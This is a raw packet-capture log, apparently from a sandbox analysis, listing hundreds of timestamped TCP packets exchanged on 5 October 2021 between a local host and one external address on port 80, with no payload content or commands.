Oct 5, 2021 22:18:03.461339951 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.461371899 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.462420940 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.466983080 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.467133999 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.467147112 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.467257023 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.631863117 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.631968975 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632008076 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632091999 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632118940 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632126093 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632149935 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632159948 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632196903 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632210970 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632220984 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632235050 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632267952 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632273912 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632307053 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632311106 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632342100 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632349014 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632383108 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632386923 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632420063 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632435083 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632452011 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632477045 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632483959 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632514000 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632543087 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632550955 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632581949 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632590055 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632606030 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632626057 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632654905 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632663012 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632683039 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632700920 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632708073 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632747889 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632755041 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632790089 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632803917 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632823944 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632827044 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632864952 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632901907 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632936954 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632961035 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.632972956 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.632970095 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.633002996 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.633009911 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.633040905 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.633059025 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.633085012 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.633100033 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.633117914 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.633136988 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.633160114 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.633174896 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.633193016 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.633215904 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.633235931 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.633250952 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.633275986 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.633287907 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.633312941 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.633342028 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.634203911 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.637801886 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.637864113 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.637900114 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.637938023 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.637959003 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.638005972 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.638012886 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.638025999 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.642638922 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.803766966 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.803828955 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.803874016 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.803910971 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.803947926 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.803991079 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804045916 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804112911 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804147959 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804169893 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804187059 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804193020 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804209948 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804234982 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804251909 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804258108 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804306030 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804312944 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804352045 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804369926 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804414034 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804415941 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804450035 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804459095 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804496050 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804534912 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804577112 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804582119 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804619074 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804625034 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804630041 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804637909 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804667950 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804672956 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804704905 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804719925 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804758072 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804807901 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804847002 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804860115 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804866076 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804871082 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804907084 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804913044 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.804960012 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.804974079 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805015087 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805016994 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.805052996 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805063009 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.805094004 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805141926 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805176973 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.805186033 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805239916 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805254936 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.805294991 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805305958 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.805349112 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805366039 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.805387974 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805425882 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805459976 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.805461884 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805509090 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805552006 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805588961 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805628061 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805665970 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805685997 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.805721998 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805753946 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.805774927 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.805794954 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.805845976 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.806277990 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.813165903 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.813224077 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.813266993 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.813314915 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.813314915 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.813343048 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.813378096 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.821275949 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.976768017 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.976825953 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.976866961 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.976907969 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.976946115 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.976994038 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977036953 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977077007 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977077961 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977125883 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977138042 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977154016 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977289915 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977333069 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977370024 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977384090 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977410078 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977431059 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977447033 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977488041 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977494001 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977495909 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977511883 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977538109 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977576971 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977576971 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977617025 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977634907 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977648020 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977657080 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977694035 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977700949 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977727890 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977731943 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977756977 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977771997 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977792025 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977821112 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977837086 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977864027 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977884054 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977901936 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977909088 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977941036 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977969885 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.977978945 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.977996111 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978015900 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978022099 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978064060 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978084087 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978101969 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978116035 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978138924 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978168964 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978177071 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978199959 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978216887 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978225946 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978264093 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978277922 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978306055 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978329897 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978343964 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978362083 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978383064 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978399992 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978420973 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978431940 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978457928 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978482962 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978496075 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978503942 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978534937 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978564978 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978583097 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978606939 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978624105 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978641987 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978661060 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978677034 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978699923 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.978723049 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.978751898 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.979301929 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.993340015 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.993388891 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.993427038 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.993464947 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:03.993493080 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.993540049 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.993549109 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:03.993554115 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.147695065 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.147980928 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.148252964 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.148313046 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.148427010 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.148435116 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.148436069 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.148499966 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.148561001 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.148642063 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.148660898 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.148674011 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.148747921 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.148765087 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.148809910 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.148827076 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.148869991 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.148902893 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.148931026 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.148989916 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149059057 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149080992 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149111986 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149125099 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149144888 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149183035 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149184942 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149245977 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149267912 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149307013 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149328947 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149365902 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149389029 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149426937 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149468899 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149487972 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149492025 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149554968 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149569988 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149610996 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149638891 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149668932 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149681091 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149727106 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149728060 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149786949 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149791002 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149846077 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149846077 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149904966 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.149909019 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149960995 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.149964094 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150018930 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150029898 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150087118 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150090933 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150142908 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150146008 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150203943 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150206089 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150266886 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150266886 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150325060 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150326014 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150382996 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150394917 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150440931 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150443077 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150505066 CEST	80	49169	101.99.90.118	192.168.2.22
Oct 5, 2021 22:18:04.150511026 CEST	49169	80	192.168.2.22	101.99.90.118
Oct 5, 2021 22:18:04.150567055 CEST	80	49169	101.99.90.118	192.168.2.22
